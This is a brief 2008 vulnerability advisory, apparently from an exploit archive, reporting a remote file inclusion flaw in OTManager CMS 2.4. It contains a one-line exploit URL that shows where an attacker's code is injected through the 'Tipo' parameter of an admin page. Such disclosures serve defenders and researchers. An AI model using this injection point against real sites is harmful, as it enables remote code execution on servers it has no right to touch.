id: 4144
date: 11/10/2008
title: OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability
author: Colt7r
cves: 

============================================================
OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability
============================================================


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2023-03-22]  #